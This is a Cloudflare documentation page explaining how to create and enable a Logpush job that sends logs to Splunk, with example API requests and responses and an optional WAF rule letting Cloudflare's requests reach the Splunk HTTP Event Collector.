Cloudflare Docs
Logs
Logs
Edit this page
Report an issue with this page
Log into the Cloudflare dashboard
Set theme to dark (⇧+D)

Enable Logpush to Splunk

Cloudflare Logpush supports pushing logs directly to Splunk via the Cloudflare dashboard or via API.

​​ Manage via the Cloudflare dashboard

  1. Log in to the Cloudflare dashboard.

  2. Select the Enterprise account or domain (also known as zone) you want to use with Logpush. Depending on your choice, you have access to account-scoped datasets and zone-scoped datasets, respectively.

  3. Go to Analytics & Logs > Logpush.

  4. Select Create a Logpush job.

  1. In Select a destination, choose Splunk.

  2. Enter or select the following destination information:

When you are done entering the destination details, select Continue.

  1. Select the dataset to push to the storage service.

  2. In the next step, you need to configure your logpush job:

    • Enter the Job name.
    • Under If logs match, you can select the events to include and/or remove from your logs. Refer to Filters for more information. Not all datasets have this option available.
    • In Send the following fields, you can choose to either push all logs to your storage destination or selectively choose which logs you want to push.
  3. In Advanced Options, you can:

    • Choose the format of timestamp fields in your logs (RFC3339(default),Unix, or UnixNano).
    • Select a sampling rate for your logs or push a randomly-sampled percentage of logs.
    • Enable redaction for CVE-2021-44228. This option will replace every occurrence of ${ with x{.
  4. Select Submit once you are done configuring your logpush job.

​​ Manage via API

To set up a Splunk Logpush job:

  1. Create a job with the appropriate endpoint URL and authentication parameters.
  2. Enable the job to begin pushing logs.
Ensure Log Share permissions are enabled, before attempting to read or configure a Logpush job. For more information refer to the Roles section.

​​ 1. Create a job

To create a job, make a POST request to the Logpush jobs endpoint with the following fields:

  • name (optional) - Use your domain name as the job name.

  • destination_conf - A log destination consisting of an endpoint URL, channel id, insecure-skip-verify flag, source type, authorization header in the string format below.

    • <SPLUNK_ENDPOINT_URL>: The Splunk raw HTTP Event Collector URL with port. For example: splunk.cf-analytics.com:8088/services/collector/raw.
    • <SPLUNK_CHANNEL_ID>: A unique channel ID. This is a random GUID that you can generate by:
    • <INSECURE_SKIP_VERIFY>: Boolean value. Cloudflare recommends setting this value to false. Setting this value to true is equivalent to using the -k option with curl as shown in Splunk examples and is not recommended. Only set this value to true when HEC uses a self-signed certificate.
  • <SOURCE_TYPE>: The Splunk source type. For example: cloudflare:json.
  • <SPLUNK_AUTH_TOKEN>: The Splunk authorization token that is URL-encoded. For example: Splunk%20e6d94e8c-5792-4ad1-be3c-29bcaee0197d.
"splunk://<SPLUNK_ENDPOINT_URL>?channel=<SPLUNK_CHANNEL_ID>&insecure-skip-verify=<INSECURE_SKIP_VERIFY>&sourcetype=<SOURCE_TYPE>&header_Authorization=<SPLUNK_AUTH_TOKEN>"
  • dataset - The category of logs you want to receive. Refer to Log fields for the full list of supported datasets.

  • output_options (optional) - To configure fields, sample rate, and timestamp format, refer to Log Output Options. For timestamp, Cloudflare recommends using timestamps=rfc3339.

Example request using cURL:

curl -s -X POST \
https://api.cloudflare.com/client/v4/zones/<ZONE_ID>/logpush/jobs \
-H "X-Auth-Email: <EMAIL>" \
-H "X-Auth-Key: <API_KEY>" \
-d '{
"name":"<DOMAIN_NAME>",
"destination_conf":"splunk://<SPLUNK_ENDPOINT_URL>?channel=<SPLUNK_CHANNEL_ID>&insecure-skip-verify=<INSECURE_SKIP_VERIFY>&sourcetype=<SOURCE_TYPE>&header_Authorization=<SPLUNK_AUTH_TOKEN>",
"output_options": {
"field_names": ["ClientIP", "ClientRequestHost", "ClientRequestMethod", "ClientRequestURI", "EdgeEndTimestamp","EdgeResponseBytes", "EdgeResponseStatus", "EdgeStartTimestamp", "RayID"],
"timestamp_format": "rfc3339"
},
"dataset": "http_requests"}' | jq .

Response:

{
"errors": [],
"messages": [],
"result": {
"id": 100,
"dataset": "http_requests",
"enabled": false,
"name": "<DOMAIN_NAME>",
"output_options": {
"field_names": ["ClientIP", "ClientRequestHost", "ClientRequestMethod", "ClientRequestURI", "EdgeEndTimestamp","EdgeResponseBytes", "EdgeResponseStatus", "EdgeStartTimestamp", "RayID"],
"timestamp_format": "rfc3339"
},
"destination_conf": "splunk://<SPLUNK_ENDPOINT_URL>?channel=<SPLUNK_CHANNEL_ID>&insecure-skip-verify=<INSECURE_SKIP_VERIFY>&sourcetype=<SOURCE_TYPE>&header_Authorization=<SPLUNK_AUTH_TOKEN>",
"last_complete": null,
"last_error": null,
"error_message": null
},
"success": true
}

​​ 2. Enable (update) a job

To enable a job, make a PUT request to the Logpush jobs endpoint. Use the job ID returned from the previous step in the URL and send {"enabled":true} in the request body.

Example request using cURL:

curl -s -X PUT \
https://api.cloudflare.com/client/v4/zones/<ZONE_ID>/logpush/jobs/100 -d'{"enabled":true}' | jq .

Response:

{
"errors": [],
"messages": [],
"result": {
"id": 100,
"dataset": "http_requests",
"enabled": true,
"name": "<DOMAIN_NAME>",
"output_options": {
"field_names": ["ClientIP", "ClientRequestHost", "ClientRequestMethod", "ClientRequestURI", "EdgeEndTimestamp","EdgeResponseBytes", "EdgeResponseStatus", "EdgeStartTimestamp", "RayID"],
"timestamp_format": "rfc3339"
},
"destination_conf": "splunk://<SPLUNK_ENDPOINT_URL>?channel=<SPLUNK_CHANNEL_ID>&insecure-skip-verify=<INSECURE_SKIP_VERIFY>&sourcetype=<SOURCE_TYPE>&header_Authorization=<SPLUNK_AUTH_TOKEN>",
"last_complete": null,
"last_error": null,
"error_message": null
},
"success": true
}

Refer to the Logpush FAQ for troubleshooting information.

​​ 3. Create WAF custom rule for Splunk HEC endpoint (optional)

If your logpush destination hostname is proxied through Cloudflare, and you have the Cloudflare Web Application Firewall (WAF) turned on, you may be challenged or blocked when Cloudflare makes a request to Splunk HTTP Event Collector (HEC). To make sure this does not happen, you have to create a WAF custom rule that allows Cloudflare to bypass the HEC endpoint.

  1. Log in to the Cloudflare dashboard and select your account. Go to Security > WAF > Custom rules.
  2. Select Create rule and enter a descriptive name for it (for example, Splunk).
  3. Under If incoming requests match, use the Field, Operator, and Value dropdowns to create a rule. After finishing each row, select And to create the next row of rules. Refer to the table below for the values you should input:
FieldOperatorValue
Request MethodequalsPOST
HostnameequalsYour Splunk endpoint hostname. For example: splunk.cf-analytics.com
URI Pathequals/services/collector/raw
URI Query Stringcontainschannel
AS Numequals132892
User AgentequalsGo-http-client/2.0
  1. After inputting the values as shown in the table, you should have an Expression Preview with the values you added for your specific rule. The example below reflects the hostname splunk.cf-analytics.com.
(http.request.method eq "POST" and http.host eq "splunk.cf-analytics.com" and http.request.uri.path eq "/services/collector/raw" and http.request.uri.query contains "channel" and ip.geoip.asnum eq 132892 and http.user_agent eq "Go-http-client/2.0")
  1. Under the Then > Choose an action dropdown, select Skip.
  2. Under WAF components to skip, select All managed rules.
  3. Select Deploy.

The WAF should now ignore requests made to Splunk HEC by Cloudflare.


​​ More resources

​​ Video tutorial: Send Network Analytics logs to Splunk

The following video shows how to integrate Network Analytics logs in Splunk.